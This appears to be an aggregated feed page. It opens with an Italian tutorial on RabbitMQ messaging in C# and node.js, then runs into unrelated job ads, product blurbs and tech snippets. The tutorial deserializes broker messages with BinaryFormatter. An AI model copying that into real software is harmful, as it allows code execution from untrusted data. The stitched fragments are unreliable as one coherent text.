    // Si definisce il nome dell'exchange: const string ExchangeName = "ExchangeExample2"; // Il nome della queue non serve più perché è creata in modo dinamico e casuale da RabbitMQ. // Il codice rimane uguale al precedente fino all'istanza di ModelCentralized: var ModelCentralized = Connection.CreateModel(); string QueueName = ModelCentralized.QueueDeclare("", false, true, true, null); ModelCentralized.ExchangeDeclare(ExchangeName, ExchangeType.Fanout); ModelCentralized.QueueBind(QueueName, ExchangeName, ""); QueueingBasicConsumer consumer = new QueueingBasicConsumer(ModelCentralized); string consumerTag = ModelCentralized.BasicConsume(QueueName, false, consumer); // Resto del codice per l'attesa dei messaggi e la sua visualizzazione uguale al precedente

    Alla definizione della queue con la funzione QueueDeclare si è lasciato il nome vuoto perché sarà RabbitMQ ad assegnarcene uno con nome casuale. Non è importante il suo nome per la ricezione dei messaggi perché un altro processo, per inviarci i messaggi, utilizzerà il nome dell'exchange. ExchangeDeclare fa proprio questo: crea, se non esiste già, un exchange e con il QueueBind è legata la queue con l'exchange. Inoltre viene definito questo exchance come Fanout: qualsiasi queue collegata a questo exchange, riceverà qualsiasi messaggio inviato. C'è una differenza in questo codice con il precedente: ora siamo noi che dobbiamo comunicare a RabbitMQ che abbiamo ricevuto ed elaborato il messaggio, e lo facciamo con questo codice:

    string consumerTag = ModelCentralized.BasicConsume(QueueName, false, consumer);

    Il secondo parametro, false, impostiamo il sistema perché siamo noi che vogliamo inviare il comandi di avvenuta ricezione che si completa con la riga successiva:

    ModelCentralized.BasicAck(e.DeliveryTag, false);

    L'invio dei messaggi non cambia molto se confrontato con il precedente, cambia solo il codice per l'invio:

    ModelCentralized.BasicPublish(ExchangeName, "", basicProperties, msgRaw);

    In questo caso viene specificato il nome dell'exchange e non il nome della queue. Avviati i due processi, la soluzione il risultato sarà uguale al precedente. Ma ora possiamo avviare due istanze del primo programma e vedremo che i messaggi saranno ricevuti da entrambi:

    Potremo attivare tutte le istanze che vogliamo: tutte riceveranno i nostri messaggi.

    Con l'uso dell'exchange possiamo definire oltre al Fanout visto in precedenza, anche la modalità Topic: in cui possiamo specificare che il collegamento tra un exchange e una o più queue venga attraverso a delle routing key con caratteri jolly. I caratteri jolly sono due: * e #. Ma non permettono la libertà che si potrebbe immaginare. Un errore che può accadere ai novizi e pensare che l'uso dei caratteri jolly debba essere utilizzato nell'invio dei messaggi. Questo è sbagliato: questi devono essere utilizzati nella definizione dell'exchange. Il messaggio inviato dovrà avere sempre una routing key valida (o vuota). Innanzitutto le routing key devono essere definiti come parole separate dal punto. Esempio:


    Se definiziamo due routing key di collegamento tra un exchange e due queue in questo modo:

    basso.*.maschile *.marroni.*

    E inviamo questi messaggi con queste routing key:

    basso.azzurri.maschile alto.marroni.femminile alto.azzurri.femminile basso.marroni.maschile azzurri.maschile

    Il primo sarà inviato solo alla prima queue, il secondo solo alla seconda queue, la terza a nessuna di esse, la quarta ad entrambi. L'ultima, non essendo composta da tre parole, sarà scartata.

    Oltre all'asterisco possiamo usare il carattere hash (#):


    La differenza è che con l'asterisco il filtro utilizzerà una sola parola mentre l'hash è un jolly completo e include qualsiasi parola o numero di parole al suo posto. La regola qui sopra accetterebbe:

    basso.azzurri.maschile marroni.maschile magro.alto.marroni.maschile

    L'esempio "Example3A" avvia due thread con due routing key differenti. Il codice è uguale agli esempi precedenti tranne che per queste due righe:

    ModelCentralized.ExchangeDeclare(_exchangeName, ExchangeType.Topic); ModelCentralized.QueueBind(QueueName, _exchangeName, _routingKey);

    Nella prima specifichiamo che il tipo di exchange è Topic, nel secondo, oltre al nome della queue e al nome dell'exchange, inseriamo anche le seguenti routing key:

    *.red small.*

    Nell'invio il codice è uguale agli esempi precedenti tranne per questa riga:

    ModelCentralized.BasicPublish(ExchangeName, "small.red", basicProperties, msgRaw); ModelCentralized.BasicPublish(ExchangeName, "big.red", basicProperties, msgRaw); ...

    Ecco la schermata di ouput:

    Se finora si è spinta l'attenzione all'invio dei messaggi con quasi tutte le sue sfaccettature - manca l'exchange con in modalità direct che vedremo nell'esempio successivo e la modalità header che non tratterò - e ora di muoverci nella direzione opposta e prestare maggiore attenzione alla modalità di lettura dei messaggi dalla queue. Con i fonout message e i topic abbiamo visto che possiamo inviare i messaggi a più queue alla volta alla quale è collegato un solo processo... e se collegassimo più processi a un'unica queue? Ecco, siamo al punto più interessante dell'utilizzo dei message broker. La queue quando riceverà i messaggi li distribuirà tra tutti i processi collegati:

    Possiamo vedere qui la distribuzione equa di tutti i messaggi tra tutti i processi. L'invio dei messaggi non è nulla di nuovo da quello che si visto finora: si usa il nome dell'exchange (in modalità direct) e una routing key (non obbligatoria); avendo il messaggio in MsgRaw l'invio è semplice:

    ModelCentralized.BasicPublish(ExchangeName, RoutingKey, basicProperties, msgRaw);

    Un po' di novità sono presenti nell'esempio per la lettura della queue (nel progetto da scaricare è Example 4A). Definiti i nomi della queue, dell'exchange e della routing key:

    const string ExchangeName = "ExchangeExample4"; const string RoutingKey = "RoutingExample4"; const string QueueName = "QueueExample4";

    ... e connessi al solito modo:

    var ModelCentralized = Connection.CreateModel(); ModelCentralized.QueueDeclare(QueueName, false, false, true, null); ModelCentralized.ExchangeDeclare(ExchangeName, ExchangeType.Direct); ModelCentralized.QueueBind(QueueName, ExchangeName, RoutingKey); ModelCentralized.BasicQos(0, 1, false);

    Nella dichiarazione della queue abbiamo ora specificato il nome, non durable, non exclusive ma con l'autodelete. L'exchange è dichiarata come Direct. La novità e la funzione richiamata "BasicQos". Qui specifichiamo che processo leggerà uno e solo un messaggio alla volta. La lettura dei messaggi avviene allo stesso modo:

    var e = (RabbitMQ.Client.Events.BasicDeliverEventArgs)consumer.Queue.Dequeue();

    Dopotutto questo sciolinare le possibilità di RabbitMq e avere visto l'invio e la ricezione dei messaggi, è ora di tornare con i piedi per terra con esempi reali. Un processo che invia un messaggio e un altro, completamente indipendete che lo preleva dalla coda e lo visualizza va bene solo nella dimostrazioni e nella demo: tutt'al più può essere utili nell'invio di messaggi per il log e poco altro. Nel mondo reale un processo ne chiama un altro per richiedere dei dati. Il Request/reply pattern fa al caso nostro. Per ricrearlo con RabbitMQ, negli esempi visti finora, dobbiamo innanzitutto creare una queue pubblica dove inviare le richieste. E ora il problema: come può il processo rispondere al processo richiedente i dati? La soluzione è semplice: il processo che richiede i dati deve avere una propria queue dove saranno depositate le risposte. Finora non siamo andati nel dettaglio dei messaggi ricevuti e avviati da RabbitMq. Possiamo specificare diverse proprietà utili per poi elaborare la comunicazione. Ecco il codice visto fino per l'invio con alcune proprietà aggiuntive:

    IBasicProperties basicProperties = ModelCentralized.CreateBasicProperties(); basicProperties.MessageId = ... basicProperties.ReplyTo = ...; msgRaw = Encoding.Default.GetBytes(...); ModelCentralized.BasicPublish(ExchangeName, "", basicProperties, msgRaw);

    MessageId e ReplyTo sono due proprietà stringa liberamente utilizzabili. E' facilmente intuibile che potranno essere utilizzati per specificare, nel caso di ReplyTo, la queue del processo richiedente. E MessageId? Lo possiamo utilizzare per specificare a quale richiesta stiamo rispondendo. Nell'esempio "Example5A" e "Example5B" facciamo tutto quanto detto finora. "Example5A" è il processo che elaborerà i nostri dati, in questo caso una banale addizione matematica. La parte più importante è quella che attende la richiesta e invia la risposta:

    var e = (RabbitMQ.Client.Events.BasicDeliverEventArgs)consumer.Queue.Dequeue(); IBasicProperties props = e.BasicProperties; string replyQueue = props.ReplyTo; string messageId = props.MessageId; string content = Encoding.Default.GetString(e.Body); Console.WriteLine("> {0}", content); int result = GetSum(content); Console.WriteLine("< {0}", result); var msgRaw = Encoding.Default.GetBytes(result.ToString()); IBasicProperties basicProperties = ModelCentralized.CreateBasicProperties(); basicProperties.MessageId = messageId; ModelCentralized.BasicPublish("", replyQueue, basicProperties, msgRaw); ModelCentralized.BasicAck(e.DeliveryTag, false);

    In questo codice prendiamo il nome della queue del richiedente e il messageId che identifica la chiamata. Utilizzando un nuovo oggetto IBasicProperties (avremo potuto usare lo stesso ma in questo modo si capisce meglio l'utilizzo), impostiamo la proprietà del MessageId e inviamo la riposta al nome della queue prelevata alla richiesta.

    Fin qui niente di complicatissimo. La parte più intricata è quella del processo che richiamerà questo servizio perché dovrà nello stesso momento crearsi una queue privata ed esclusiva, e inviare le richieste alla queue pubblica. Non potendo usare una chiamata sincrona (e sarebbe assurdo), utilizzerò due thread, uno che invierà le richieste e un secondo per le risposte. Per gestire le richieste utilizzeremo un dictionary dove sarà salvato il messageId e la richiesta:

    messageBuffers = new Dictionary(); messageBuffers.Add("a1", "2+2"); messageBuffers.Add("a2", "3+3"); messageBuffers.Add("a3", "4+4");

    Quindi è definito il nome fittizio della queue privata dove il servizio dovrà inviare le risposte:

    QueueName = Guid.NewGuid().ToString();

    L'invio delle richieste è il seguente (come già visto):

    foreach (KeyValuePair item in messageBuffers) { IBasicProperties basicProperties = ModelCentralized.CreateBasicProperties(); basicProperties.MessageId = item.Key; // a1, a2, a3 basicProperties.ReplyTo = QueueName; msgRaw = Encoding.Default.GetBytes(item.Value); // 2+2, 3+3, 4+4 ModelCentralized.BasicPublish(ExchangeName, "", basicProperties, msgRaw); }

    E ora il thread per le risposte:

    while (true) { var e = (RabbitMQ.Client.Events.BasicDeliverEventArgs)consumer.Queue.Dequeue(); string content = Encoding.Default.GetString(e.Body); string messageId = e.BasicProperties.MessageId; Console.WriteLine("{0} = {1}", messageBuffers[messageId] , content); ModelCentralized.BasicAck(e.DeliveryTag, false); }

    Molto semplice, letta la risposta inviata da RabbitMq, si legge il MessageId con il quale si prende il testo della richiesta per potergli assegnare la corretta risposta (in questo caso è solo per la visualizzazione).

    Anche in questo caso possiamo avviare più processi in attesa di essere chiamato. Esso può essere sulla stessa macchina, oppure potrebbe essere dall'altra parte del pianeta: unica regola perché possa rispondere a una richiesta è che sia raggiungibile e collegato a RabbitMQ. A questo punto è facile intuire la potenzialità che avrebbe questa possibile strada: un message broker al centro e una o più macchine collegate a esso su cui girano decine di micro servizi ognuno responsabile di una o più funzioni. Nulla ci vieta di mettere, insieme alla funzione della somma qui sopra esposta, un servizio per la richiesta dell'elenco di articoli per un sito di e-commerce. Possiamo creare un altro micro service per la gestione degli utenti e del loro carrello. E il bello è che possiamo installarli sulla stessa macchina come in una webfarm con decine di server. Inoltre, al crescere delle necessità, potremo installare lo stesso micro service su più server - si ricordano le ascisse del cubo?

    Siamo onesti: questa tecnica ha potenzialità incredibili ma ha il classico fascino da demo dinanzi a clienti: bello finché rimane semplice. Alzando anche di poco l'asticella si scoprirà che solo passare da una queue a più queue in una nostra applicazione rende il tutto dannatamente confuso e poco gestibile. Se si osserva solo il codice di Example5A si può notare che, per rendere il codice più breve possibile, ho lasciato il tutto in un unico thread e non in versione ottimale e ciò non aiuta completamente la comprensione dello stesso; inoltre per la gestione più performante l'uso di thread separati per le richieste e le risposte sarebbe consigliabile, così come per la gestione di possibili multi queue. Il consiglio è incapsulare tutte queste funzioni così come ho provato nell'esempio finale che si può trovare nella soluzione con il nome "QuickSortRabbitMQ". Quicksort? Dove avevamo già parlato di esso? Ma certo, all'inizio di questo post. Da esso era nato tutto questo discorso che ci ha fatto spaziare dalla distribuzione di processi sino all’uso di un message broker. Anche se solo per scopo didattico, si immagini che creare un micro service per l'ordinamento di un array di interi. Come visto, il quicksort divide l'array in due sotto array grazie ad un valore pivot. E se questi due sotto array li ripassassimo allo stesso micro service e così via per avere l'array ordinato? Il micro service in questione rimarrà in attesa, grazie a rabbitMQ, di una richiesta diretta a lui o, per meglio dire, alla queue dove lui preleverà l'array da ordinare. Quindi avrà una seconda queue privata, dove aspetterà l'ordinamento degli array che lui stesso invierà alla queue principale. Incasinato, vero? Sì, questo è il modo di richiamare micro service con un message broker in modo ricorsivo, e la ricorsività è quella che abbiamo bisogno per il quicksort.

    Spiegando con un esempio, avendo questo array da ordinare, lo inviamo alla queue principale del nostro micro service di ordinamento:

    [4,8,2,6] -> Public queue

    Al primo giro, il nostro micro service potrebbe dividere l'array in due sotto array con pivot 5, che saranno inviati a loro volto alla public queue:

    [4, 2] -> Public queue [8, 6] -> Public queue

    Ora due volte sarà richiamato lo stesso micro service che ordinerà i due soli numeri presenti e dovrà restituirli... sì, ma a chi? Semplice, a se stesso... E come? Potremo usare ancora la public queue, ma questo comporta un problema non di poco conto. Se si ricorda l'algoritmo di ordinamento quicksort, lo stesso metodo attende i due array inviati ma questa volta ordinati, quindi deve restituire l'unione dei due array a chi lo aveva chiamato. Quindi dobbiamo tenere traccia dei due array inviati per essere uniti: e come si potrebbe fare se questo micro service avesse più istanze attive e un'array finisse in un processo sulla macchina A e il secondo array in un processo sulla macchina B? Il processo che invia la richiesta DEVE ESSERE quello che riceve le risposte viste ora, e lo possiamo fare solo creando una queue privata nello stesso processo e con l'uso delle property nei messaggi, indirizzare la risposta alla queue corretta.

    [2,4] -> Private queue processo chiamante [6,8] -> Private queue processo chiamante

    Il processo chiamante rimarrà in attesa anche sulla queue private di entrambe le risposte che unirà prima di restituirla a sua volta al processo chiamante, che potrebbe essere ancora se stesso o un altro.

    Già si può immaginare la complessità di scrivere del codice che, utilizzando su più thread, gestisca questo casino. Per semplificare le cose ho creato una piccola libreria che, in completa autonomia, crea i thread di cui ha bisogno e grazie agli eventi comunica con il processo i messaggi provenienti dal message broker. Nel codice della soluzione di esempio è nel progetto "RabbitMQHelperClass". Questa libreria è utilizzata dal progetto "QuickSortRabbitMQ". Siamo arrivati a destinazione: qui troviamo la console application che utilizza questo message broker per la comunicazione delle "porzioni" di array da ordinare con il quicksort. La prima parte è semplice: creato un array di 100 elementi e popolato con numero interi casuali da 1 a 100, ecco che viene istanziata la classe che ci faciliterà il lavoro (o almeno ci prova).

    using (rh = new RabbitHelper("localhost")) { rh.AddPublicQueue(queueName, exchangeName, routingKey, false); var privateQueueThread = rh.AddPrivateQueue();// "QueueRicorsiva"); privateQueueName = privateQueueThread.QueueInternalName;

    E' presente la funzione per la creazione di una queue public (dove saranno inviate le richieste di array da ordinare). Quindi è creata una queue privata, che sarà usata per restituire al chiamante l'array ordinato.

    var privateQueueResultThread = rh.AddPrivateQueue();// "QueueFinale"); privateQueueNameResult = privateQueueResultThread.QueueInternalName;

    Qui è creata una ulteriore queue privata: questa sarà utilizzata perché sarà quella che conterrà il risultato finale alla fine del ciclo ricorsivo (a differenza delle queue pubblica che è univoca, la queue privata possono essere più di una). E' ora di collegare gli eventi:

    string messageId = RabbitHelper.GetRandomMessageId(); rh.OnReceivedPublicMessage += Rh_OnReceivedPublicMessage; privateQueueThread.OnReceivedPrivateMessage += Rh_OnReceivedPrivateMessage; privateQueueResultThread.OnReceivedPrivateMessage += Rh_OnReceivedPrivateMessageResult;

    In messageId è un guid univoca casuale. OnReceivePublicQueue è l'evento che sarà eseguito quando arriverà un messaggio alla queue pubblica prima creata. La stessa cosa per le due queue private con: OnReceivedPrivateMessage. E' ora di far partire la nostra procedura di ordinamento:

    var msgRaw = RabbitHelper.ObjectToByteArray>(arrayToSort); rh.SendMessageToPublicQueue(msgRaw, messageId, privateQueueNameResult);

    Come visto in precedenza, tutto quello che è trasmesso via RabbitMQ viene serializzato in formato di array di byte. La funzione ObjectToByteArray fa questa operazione (ne riparleremo anche più avanti) e SendMessageToPublicQueue invia l'array da ordinare alla queue pubblica; inoltre viene inviato anche il nome della queue privata che rimarrà in attesa della risposta finale dell'ordinamento completato. Ok, ora la classe che avrà creato per noi thread per l'elaborazione delle queue, riceverà il messaggio e invierà il suo contenuto, con altre informazioni, all'evento prima definito "OnReceivedPublicMessage". Qui è stata riscritta la funzione di ordinamento vista all'inizio di questo post:

    private static void Rh_OnReceivedPublicMessage(object sender, RabbitMQEventArgs e) { string messageId = e.MessageId; string queueFrom = e.QueueName; var toOrder = RabbitHelper.ByteArrayToObject>(e.MessageContent); Console.Write(" " + toOrder.Count.ToString()); if (toOrder.Count <= 1) { var msgRaw = RabbitHelper.ObjectToByteArray>(toOrder); rh.SendMessageToPrivateQueue(msgRaw, messageId, queueFrom); return; }

    Preso il contenuto dell'array, più le informazioni (l'id univoco del messaggio e la coda a cui dovremo rispondere), si controlla che la sua dimensione sia maggiore di uno, altrimenti manda come risposta, alla queue privata, lo stesso array inviato. Il resto del codice divide dal valore pivot gli elementi dell'array minore e maggiore e invia questi due array alla queue pubblica:

    var rs = new RequestSubmited { MessageParentId = messageId, MessageId = RabbitHelper.GetRandomMessageId(), QueueFrom = queueFrom, PivotValue = pivot_value }; lock (requestCache) { requestCache.Add(rs); } var msgRaw1 = RabbitHelper.ObjectToByteArray>(less); rh.SendMessageToPublicQueue(msgRaw1, rs.MessageId, privateQueueName); var msgRaw2 = RabbitHelper.ObjectToByteArray>(greater); rh.SendMessageToPublicQueue(msgRaw2, rs.MessageId, privateQueueName);

    RequestSubmited è una classe che contiene solo delle proprietà per l'identificazione della risposta inviata da un altro (o dallo stesso) processo proveniente dal message broker.

    Solo quando gli array sono ridotti a una unità viene inviato il tutto alle queue private: Rh_OnReceivedPrivateMessage. Questo evento dev'essere richiamato due volte per le due parti di array divise dal valore pivot. La prima parte di questa funzione non fa altro che aspettare che entrambe arrivino alla funzione prima di essere unite. L'oggetto di tipo RequestSubmited è usato per richiamare i valori dell'id del messaggio e del pivot:

    private static void Rh_OnReceivedPrivateMessage(object sender, RabbitMQEventArgs e) { string messageId = e.MessageId; string queueFrom = e.QueueName; ... codice per riprendere entrambe le queue ... infine viene mandato l'array ordinato alla queue privata var msgRaw = RabbitHelper.ObjectToByteArray>(result); rh.SendMessageToPrivateQueue(msgRaw, messageParentId, queueParent); }

    Non mi soffermo sul codice che esegue l'ordinamento (che abbiamo già visto) e per recuperare le due code (è un banale controllo su un oggetto List<...>); inoltre il codice sorgente è facilmente consultabile ed è possibile testarlo. Vediamo però l'effetto finale:

    Il bello è possiamo attivare più volte questo processo per permettere l'ordinamento in parallelo su più processi, anche su diverse macchine:

    Nella window sottostante è visibile solo un'informazione di debug che sono il numero di elementi inviati.

    Se ci fosse un premio su come complicare una procedura per sua natura semplice, dopo quest'ultimo codice potrei concorrere per il primo premio senza problemi. In effetti, questo esempio - il quicksort - presenta un grave problema perché possa essere utilizzato con profitto per il calcolo distribuito: il primo tra tutti è che le porzioni di array da ordinare sono da inviare completamente quando, con molto meno e con solo i reference all'array da ordinare, il tutto si sistemerebbe in modo molto più veloce. Ma questo mi era venuto in mente come esempio...

    Iniziamo a tirare qualche conclusione: la più semplice è che devo lavorare meglio sugli esempi da portare; la seconda conclusione è che effettivamente il message broker (in questo caso RabbitMQ) esegue molto bene il suo lavoro se decidiamo di abbracciare il mondo dei micro service. Ritornando al cubo, possiamo far comunicare i processi su qualsiasi ascissa in modo veloce e affidabile. Inoltre possiamo fare in modo che anche comunicazione tra processi siamo facilitati anche per l'invio di cambiamenti di configurazione. Tornando a un esempio precedente dove abbiamo utilizzato la comunicazione fanout (senza filtri, a tutte le queue collegate a quell'exchange). E ora pensiamo a una moltitudine di microservice avviati su uno o più server. Di default questi potrebbero avere un proprio file di configurazione utilizzato all'avvio dello stesso: ma cosa succederebbe se dobbiamo cambiare uno di questi parametri? Di default su tutti i processi potrebbe essere inserito il nome di un server ftp dove inserire dei file. In caso si dovesse cambiare l'URI di questo server, che cosa dovremo fare? Modificare tutti i file di configurazione di tutti i processi? E se ce ne dimentichiamo qualcuno? Soluzione più pratica potrebbe essere la predisposizione di un micro service che fa solo questo: tutti i processi, una volta avviati, leggerebbero di default il file di configurazione salvato insieme all'eseguibile, e di seguito potrebbe richiedere a quel microservice la nuova configurazione (che potrebbe sovrascrivere quelle precedente). Oppure ogni microservice potrebbe avere una queue privata collegata a un exchange che potrebbe inviare modifiche alla configurazione in tempo reale. Questo passaggio ci consentirebbe addirittura di inviare il nuovo URI per il server FTP, aspettare che tutti i processi si siano aggiornati, quindi spegnere il primo server tranquilli che nessuno lo sta utilizzando.

    Ripetendoci, possiamo fare in modo di scrivere una miriade di microservice per le operazioni più disparate: dall'accesso ad una tabella di un database, all'invio di email, alla creazione di grafici; ogni servizio raggiungibile grazie ad un exchange e, a seconda delle esigenze che potrebbe aumentare, poter collegare più processi che il message broker possa richiamare bilanciando il carico tra tutte le risorse disponibili. E l'interoperabilità? Il message broker non si crea problemi su chi o cosa lo chiami. Potrebbe essere così come un client scritto con il Framework .Net come fatto in questo post, oppure Java... In questo caso, come comunichiamo con oggetti più complessi delle stringhe usate nei primi esempi e inviamo, come nell'esempio del quicksort, oggetti serializzati nativi per una determinata tecnologia?

    Vediamo che succede. Nell'Esempio6A proviamo proprio questo: innanzitutto creiamo un oggetto semplice da serializzare come una lista di interi:

    var content = new int[] { 1, 2, 3, 4 };

    Quindi la inviamo a RabbitMQ con il codice che conosciamo:

    IBasicProperties basicProperties = ModelCentralized.CreateBasicProperties(); var msgRaw = ObjectToByteArray(content); ModelCentralized.BasicPublish("", QueueName, basicProperties, msgRaw);

    ObjectToByteArray è una funzione usata anche dall'esempio del quicksort:

    public static byte[] ObjectToByteArray(T obj) where T : class { BinaryFormatter bf = new BinaryFormatter(); using (var ms = new MemoryStream()) { bf.Serialize(ms, obj); return ms.ToArray(); } }

    E ora non ci rimane che vedere che cosa succede, una volta inserito questo oggetto in una queue, come leggerlo con un'altra tecnologia. Proviamo con node.js (confesso che questo mio interesse per i message broker sia nato per questa tecnologia e solo dopo l'ho "convertita" al mondo del Framework .Net). Avendo installato sulla propria macchina npm e nodejs, da terminale, basta preparare i pacchetti:

    npm install amqp

    Quindi un text editor:

    var amqp = require('amqp'); var connection = amqp.createConnection({ host: 'localhost' }); // Wait for connection to become established. connection.on('ready', function () { // Use the default 'amq.topic' exchange connection.queue('Example6', function (q) { // Catch all messages q.bind('#'); // Receive messages q.subscribe(function (message) { // Print messages to stdout console.log(message.data.toString()); }); }); });

    NodeJs rende il tutto più banale grazie alla sua natura asincrona. Connesso al server di RabbitMQ su localhost, all'evento ready al momento della connessione ci si connette alla queue "Example6" (la stessa queue usata nell'Esempio6A) e con il subscribe si attende la risposta. Lanciamo questa mini app:

    node example1.js

    Quindi avviamo Esempio6A.exe:

    Ovviamente, NodeJs non sa che farsene di quell'array di byte incomprensibili. E la soluzione? Io non so qual è la strada più performante e migliore, ma la più semplice e riutilizzabile per qualsiasi tecnologia è grazie a json. Il codice di invio prima visto lo possiamo trasformare in questo modo:

    var json = new JavaScriptSerializer().Serialize(content); msgRaw = Encoding.Default.GetBytes(json); ModelCentralized.BasicPublish("", QueueName, basicProperties, msgRaw);

    E inserito nella queue, una volta letto dall'app in nodejs avremo:

    Perfetto, con nodejs l'uso di json è semplicissimo così come con il Framework .Net visto che come possiamo serializzare un oggetto in formato json lo possiamo anche trasformarlo nel suo formato originale. Ci sono soluzioni migliori? Sono disponibile a qualsiasi consiglio, come sempre.

    E' ora di chiudere. Conclusioni? Non ce ne sono. Un message broker semplifica la struttura di app basate su microservice. E' l'unica scelta? No. Avrei voluto continuare questo discorso con la comunicazione tra microservice grazie a Redis dell'Italiano Salvatore Sanfilippo, ma la mia conoscenza in merito è ancora deficitaria e mi sono scontrato subito con delle problematiche che non ho ancora risolto (il tempo disponibile è quello che è). Uno dei vantaggi che ho notato immediatamente a confronto di RabbitMQ è la velocità spaventosamente superiore. Forse in futuro affronterò l'argomento su questo blog... sempre se, lo ripeto, la voglia e il tempo me lo permetteranno. Altra soluzione è con l'utilizzo di Akka.Net: anche in questo caso le prestazioni sono superiori e il tutto è più semplificato per la comunicazione di messaggi; il problema grosso in cui mi sono imbattuto subito è la difficile interoperabilità tra diverse tecnologie, ma la mia conoscenza da novizio non mi hanno fatto andare oltre le basi. Ok, basta così.

    Tutto il codice di esempio è disponibile qui:


    Tags: ,

    Continua a leggere Divide et impera con c# e un message broker.

    (C) 2017 ASPItalia.com Network - All rights reserved

              Oracle Database Administrator   
    TX-Dallas, Mastech Digital provides digital and mainstream technology staff as well as Digital Transformation Services for leading American Corporations. We are currently seeking an Oracle Database Administrator for our client in the Energy/Utilities domain. We value our professionals, providing comprehensive benefits, exciting challenges, and the opportunity for growth. This is a Contract position and the c
              Caching in – adventures in Oracle Tuning   
    Given the job of tuning a problem statement, I’ll usually try to work on it on a lightly used database. More importantly, where practical, I’ll execute the statement twice, one after the other, and use the response time for the … Continue reading
              Putting web threat protection and content filtering in the cloud   

    Webroot compares deploying secure web gateways as software or appliances on-premises vs. as a cloud-based service. Lower cost, fast implementation, rapid scalability and less administration are all good reasons to adopt SaaS and cloud-based applications. In addition to these benefits, cloud-based secure web gateways can also provide better security and faster performance than appliances or local servers. It discusses a number of advantages of cloud-based solutions that appliances cannot match, such as:

    - Better defense against zero-day threats and spam servers

    - More comprehensive signature and URL database

    - Supports remote users more securely and without the cost of putting servers in every location

              Registry Clean Expert   
    The Windows registry is a database repository for information about a computer's configuration. The registry keep growing when you use Windows. As it does so, it attracts obsolete and unnecessary information, and gradually becomes cluttered and fragmented. With the growing of the registry, it can degrade the performance of the whole system and cause many weird software problems. Feature highlights include: - Scan Windows registry and find incorrect or obsolete information in the registry. - Fix the obsolete information in Windows registry with this Registry Cleaner and boost your Windows performance. - Make backups for Windows Registry. - Restore Windows Registry from previous backup. - Manage the programs started when Windows starts up with the Startup Organizer. - Manage the IE BHOs with BHO organizer. - Remove Spyware, Adware and Trojan hidden in your startup items and BHOs. - Registry Compact and Registry Defrag. - Built-in Tracks Eraser for privacy protection. - A user-friendly interface makes it easy for anyone to use Registry Clean Expert. Tag:Registry Clean Registry Cleaner Registry Optimizer Registry Tweak Registry Fix Registry Repair Registry Drill Registry Defrag Registry Washer Registry Shower Reg Organizer Reg Cleaner RegSeeker Startup Organizer Registry Clean Software Registry Clean XP
              RESOURCES CLERK - Ministry of Natural Resources and Forestry - Fort Frances, ON   
    Demonstrated proficiency with computers and software programs such as word-processing, database, electronic mail, internet, spreadsheet and financial and... $22.76 - $26.46 an hour
    From Ontario Public Service - Fri, 16 Jun 2017 21:25:36 GMT - View all Fort Frances, ON jobs
              Moodle Site Policy Manager   
    BUY THIS ITEM Moodle Site Manager is a local Moodle plugin to create/edit a site policy in Moodle using the WYSIWYG editor (i.e rich text) and save it to the database. The site policy can then be displayed and used as the site policy URL in the Moodle site configuration.
              Windows Vista: Kernel Changes - Kernel Transactions   

    Originally posted on: http://geekswithblogs.net/sdorman/archive/2006/06/18/82249.aspx

    Kernel Transaction Manager (KTM)

    Before Vista, applications had to do a lot of hard work to recover from errors during the modification of files and registry keys. Windows Vista implements a generalized transaction manager called the Kernel Transaction Manager (KTM) which provides “all or nothing” transaction semantics. This means that changes are committed only when the associated transaction is completed and commits.

    The KTM is extensible through third-party resource managers and coordinates between the transaction clients (the applications) and the resource managers.

    The registry and NTFS have been enhanced to provide transaction semantics across all operations and is used by the Windows Update service and the System Protection services.

    Vista also picks up the Common Log File System (Clfs.sys) introduced in Windows Server 2003 R2, which provides efficient transaction logging facilities.

    Transaction APIs

    Transactions can span modification across one or many registry keys, files, and volumes. By using the Distributed Transaction Coordinator (DTC) transactions can coordinate changes across files, registry, databases, and MSMQ.

    Transactions are relatively easy to use in Vista with the introduction of the new transaction command, which allows scripts to participate in the transaction process.

    The Windows API also has a new set of API functions:

    • CreateTransaction
    • SetCurrentTransaction
    • CommitTransaction
    • RollbackTransaction

    The kernel has IoCreateFile, which now has an ExtraCreateParameters which specified the transaction handle.

              E-book Readers, and their accoutrements   
    Now that you have turned off the outside tap, and are huddled inside watching the mums wither, you can feel bad about not having your holiday decorations up. I'm kidding--I am of the school that says that one should not flick a switch on a colored light until the last Day After Thanksgiving sandwich has been consumed.

    I am not a traditionalist, however, when it comes to e-books. People ask me about e-books all the time, and more often than not, they preface it by apologizing. Please, stop it. I may be a librarian, but I do not worship at the altar of the printed word. These days, if I added up the time each day that I spend reading from a glowing screen, or listening to audio-books, it would far surpass the time I spend staring at a piece of paper.

    Yes, I grew up with books, magazines, and two daily newspapers (morning and afternoon--really). When I went to Library School we learned how to type catalog cards, but after I graduated, I created a database that printed the information for me in card format--until a grant came along to buy an automated system. Goodbye, card catalog...

    Many librarians love technology. We jump on the technology bandwagon too quickly sometimes--microfiche, anyone? Second Life? I wasted an afternoon a couple of years ago, listening to a Second Life enthusiast describing how we would all be running our libraries on Second Life any minute. I wonder what he's promoting now...

    The first e-book reader I saw was a RocketBook--this was in 2000 or so. It was clunky, and being circulated in a public library. Oh, yes, in 2000. We were told that they would be replacing books any minute, and here we are in 2010, and still waiting to see which e-book reader will become the standard format. Kindle, Nook, Sony Reader, iPad?

    A lot of people I know receive them as gifts, so I expect to see more in a few months from now. If you are thinking of getting one, or if someone wants to give you one, the Upper Hudson Library System does have e-books that you can load onto your reader. Please go to this page to find out which readers you can use with our collection.

    If you'd like to see what titles are available in digital format (audio and e-books, and yes, some video), go to this page. Come in to the library, if you like, and ask me about it. And don't apologize. You're reading. Reading is good. I approve.

    PS If you think you know an e-book reader who would like a knitted cozy to protect the gadget, here's a link to a pattern for a knitted e-book reader.
              L3 Ops - Database Operations - Morgan Stanley - New York, NY   
    Greenplum Database Design. Greenplum performance monitoring and troubleshooting. Team is responsible for providing day to day Greenplum DBA support for MSWM and...
    From Morgan Stanley - Tue, 27 Jun 2017 18:14:07 GMT - View all New York, NY jobs
              Database Administrator / Architect - Morgan Stanley - New York, NY   
    O Candidate should be highly experience with SQL and working with warehouse specific database technologies like Teradata, Greenplum and DB2-UDB....
    From Morgan Stanley - Fri, 09 Jun 2017 20:57:33 GMT - View all New York, NY jobs
              Senior Systems Engineer/ Big Data - Dell - Remote   
    Greenplum, MPP databases, Data Lake strategy, heterogeneous data management, BI/DW, visualization etc). 5+ years of experience with deep understanding in...
    From Dell - Wed, 03 May 2017 23:31:25 GMT - View all Remote jobs
              Senior Systems Engineer/ Big Data - Virtustream Inc. - United States   
